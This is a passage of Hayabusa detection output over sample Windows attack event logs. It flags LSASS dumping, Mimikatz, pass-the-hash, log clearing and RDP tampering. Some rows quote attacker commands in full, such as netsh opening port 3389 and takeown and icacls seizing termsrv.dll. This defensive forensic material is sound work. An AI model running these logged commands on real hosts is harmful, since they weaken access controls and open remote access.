: IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx -2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx -2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx -2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx -2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx -2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Suspicious GrantedAccess Flags on LSASS 
Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx -2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx -2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx -2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" : Path: C:\Windows\System32\cmd.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o : Path: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe : User: PC04\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Registry 
Modification,,rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow : Path: C:\Windows\System32\netsh.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Netsh Port or Application Allowed,,rules/sigma/process_creation/win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Netsh RDP Port Opening,,rules/sigma/process_creation/win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : 
Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" : Path: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll : Path: C:\Windows\System32\takeown.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,File or Folder Permissions 
Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx -2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k 
DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx -2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,informational,Logon Type 9 - NewCredentials,User: user01 : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x4530f0f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: user01 : LogonID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx 
-2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: BGinfo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.576 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents\desktop.ini : IP Address: 
